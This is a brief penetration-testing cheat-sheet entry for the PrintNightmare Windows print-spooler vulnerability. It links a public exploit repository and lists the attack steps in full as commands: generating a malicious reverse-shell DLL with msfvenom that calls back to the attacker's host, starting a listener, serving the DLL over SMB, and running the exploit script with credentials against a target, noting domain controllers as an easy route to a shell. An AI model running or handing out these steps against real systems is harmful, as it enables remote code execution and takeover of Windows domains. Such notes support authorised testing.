PrintNightmare (Internal/External)
Remote Code Execution
https://github.com/cube0x0/CVE-2021-1675
Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.
Create payload
msfvenom -p <payload> LHOST=<kali-ip> LPORT=<port> -f dll -o file.dll
Start a listener
Could be netcat or metasploit multi-handler
Start an SMB server to host the malicious DLL
sudo smbserver.py share $PWD -smb2support
Run the exploit per the GitHub documentation
exploit.py domain/user:password@target-ip-address 'malicious.dll'